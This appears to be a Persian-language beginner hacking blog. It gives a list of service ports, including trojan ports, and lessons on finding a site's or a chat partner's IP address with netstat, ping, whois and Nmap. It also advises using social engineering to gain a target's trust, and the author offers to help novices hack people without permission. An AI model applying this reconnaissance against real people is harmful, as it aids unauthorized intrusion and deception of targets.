1433 tcp ms-sql
1494 tcp citrix
1498 tcp sybase-sql-anywhere
1524 tcp ingres-lock
1525 tcp oracle-srv
1527 tcp oracle-tli
1723 tcp pptp
1745 tcp winsock-proxy
2000 tcp remotely-anywhere
2001 tcp cisco-mgmt
2049 tcp nfs
2301 tcp compaq-web
2447 tcp openview
2998 tcp realsecure
3268 tcp ms-active-dir-global-catalog
3268 udp ms-active-dir-global-catalog
3300 tcp bmc-patrol-agent
3306 tcp mysql
3351 tcp ssql
3389 tcp ms-termserv
4001 tcp cisco-mgmt
4045 tcp nfs-lockd
5631 tcp pcanywhere
5800 tcp vnc
6000 tcp xwindows
6001 tcp cisco-mgmt
6549 tcp apc
6667 tcp irc
8000 tcp web
8001 tcp web
8002 tcp web
8080 tcp web
9001 tcp cisco-xremote
12345 tcp netbus
26000 tcp quake
31337 udp backorifice
32771 tcp rpc-solaris
32780 udp snmp-solaris
43188 tcp reachout
65301 tcp pcanywhere-def



فعلا پورت های مهم برای ما پورت های 7، 15، 21، 23، 25، 79،80،110و119 هستند
حالا هر کی می خواد دانلود کنه خب حالا می رسيم به مبحث تعيين پورت باز که يه نمونه رو گفتم حالا با استفاده از نرم افزار می خواهيم اين کار را بکنيم ندم افزار همون جوری که گفته بودم
هست حالا هر کی می خواد دانلود کنه دستشو ببره بال مستقيما اين آدرس رو تو اينترنت اکسپلرر تون بنويسين تا دانلود کنين Nmap
www.eeye.com/html/Datbases/Software/nmapnt.html

فعلا همين رو داشته باشين تا بعدا بقيه اسش را بگم يعنی حول و حوش شنبه ، يکشنبه تا اون موقع هرکی لينک هک بلده پيام بزاره و هرکی هم که می خواد هم کاری کنه بازم پيام بزاره

 

درس دوم

 اواين چيزی که يه هکر بايد بلد باشه پيدا کردنه آی پی طرف مقابله(برای کلاينت)پيدا کردن آی پی می تونه تو چت باشه و يا از طريق های ديگر ولی من چند نوع پيدا کردن آی پی رو به شما می گم حتما می پرسين آ پی چيه؟آی پی به آدرس هايي گفته می شود که در اينترنت کاربرد دارند مثلا داده ها در اينترنت از طريق همين آی پی ها منتقل می شه يعنی آی پی يه نوع آدرس اينترنتی است که در هر دفعه اتصال به اينترنت تغيير می کند و يه عددی مثل 125.124.23.26 اولين راهی که برای پيدا کردن آی پی به ذهن يه هکر در چت می افته استفاده از دستور زيره يعنی

netstat

خب وقتی اين دستور را در کامند پرومنت تايپ کنيد در صورتی که اينترنت قطع باشد نتايج زير حاصل می شود و اگر هم وصل باشد آی پی ها نمايش داده می شود

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

D:\>netstat

Active Connections Proto Local Address Foreign Address State

در شکل اينترنت من قطع بوده است و می بينيد که هيچ آدرسی نمايش داده نمی شود ولی اگر اينترنت وصل بود و من هم در حال چت با فردی بودم آی پی او نمايش داده می شه ولی الان خالی هست خب پيدا کردن آی پی در چت رو گفتم اما چه جوری آی پی يه سايت رو پيدا کنيم برای اطن کار دو روش وجود داره اولی اينه که به سايت پينگ کنيم و دومی هم هوايز کردن سايت است که روش هر دو اين زير هست ولی برای تمامی سايت ها هوايز کردن بهتره چون نتيجه ی بهتری را در بر دارد

ping site name

روش بالا برای هر سايتی قابل استفاده است مثلا به مثال زير توجه کنيد

ping persianblog.com

دقت کنيد که ما نام سايت را وارد می کنيم و با استفاده از اين روش به نتايج زير رسيديم

pinging persianblog.com [xxx.yyy.zzz.nnn] with 32 bytes of data:

Reply from xxx.yyy.zzz.nnn bytes=32 time=821ms TTL =111
Reply from xxx.yyy.zzz.nnn: bytes=32 time=821ms TTL =111
Reply from xxx.yyy.zzz.nnn: bytes=32 time=822ms TTL =111
Reply from xxx.yyy.zzz.nnn: bytes=32 time=811ms TTL =111


Ping statistics for 63.148.227.65:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 811ms, Maximum = 822ms, Average = 818ms

می باشدxxx.yyy.zzz.nnnملاحظه می کنيد که آی پی پرشين بلاگ

برای روش دوم هم به مثال زير توجه کنيد

http://www.samapade.org/t/ipwhois?a=persianblog.com

بعد از زدن اينتر اطلاعات زير نمايش داده می شود

whois -h magic xxx.yyy.zzz.nnn
sazin.com resolves toxxx.yyy.zzz.nnn

Trying whois -h whois.arin.net xxx.yyy.zzz.nnn
Qwest Communications NET-QWEST-BLKS-2 (NET-63-144-0-0-1)
63.144.0.0 - 63.151.255.255
Neutron Digital Media Corp. QWST-63-148-224 (NET-63-148-224-0-1)
63.148.224.0 - 63.148.231.255

# ARIN Whois database, last updated 2002-09-04 19:05
# Enter ? for additional hints on searching ARIN's Whois database.

در دو سطر اول آی پی طرف مقابل(سايت)مشخص می شود

سايت های معروف اين کار


whois.internic.net (The InterNIC)
whois.onlinenic.com (The OnLineNIC)
whois.arin.net (American Registry for Internet Numbers)
whois.ripe.net (European IP Address Allocations)
whois.apnic.net (European IP Address Allocations)
whois.nic.mil (US Military)
whois.nic.gov (US Government)

ولی همون اولی که مثال زدم از همه بهتره می گی نه نگاه کن
بعد اين می رسيم به پيدا کردن آی پی کلاينت برای اين کار چند روش وجود دارد که شما می توانيد يکی از اين روش ها را برگزينيد البته با ساب سون نيز می شود اما قبلا بايد او را هک
کرده باشيد جالا مراحل زير را دنبال کنين تا آخر
اولين راه فرستادن فايله که اول بايد از مهندسی اجتماعی استفاده کنيد تا به شما اعتماد کنه و گر نه که قيد اينو بزنين
در کامند پرومنت است که در بالا گفتم Netstat -n راه دوم نوشتن دستور
اين دستور بيشتر در چت کاربرد دارد
راه سوم هم زدن مخه يعنی سريش بازی در آوردن
و راه حل آخر هم که برای مسخره بازی نوشتم پرسيدن آی پی از طرفه(چقدر بامزه)مسخره بود نه

درس اول

 هک چی بيده و هکر کی بيده؟هکر به کسی که از رايانه اطلاعاتی دارد و می تواند بدون اجازه وارد سيستم های کامپيوتری شود

چه چيزايي رو ياد بگيريم؟ اول از همه تی سی پی/آی پی(اگه آقا آراز تو سايتش نذاشت خودم اينجا می زارم) دوم ويندوز 2000 و لينوکس

برای زنگ های تفريح بين درس ها من از مسايل هک غير مربوط استفاده می کنم مثلا آموزش داشتن اينترنت رايگان و اين جور مسايل

از تمامی عرزيزانی که در زمينه ی هک يه جورايي (مثل من)هستن درخواست می شه به من کمک کنن حتی اگر اولين بارشونه که می هوان يه نفر رو هک کنن من به اونا هم کمک می کنم

خب حرف و احراف تموم شد حالا نوبت چی شده آموزش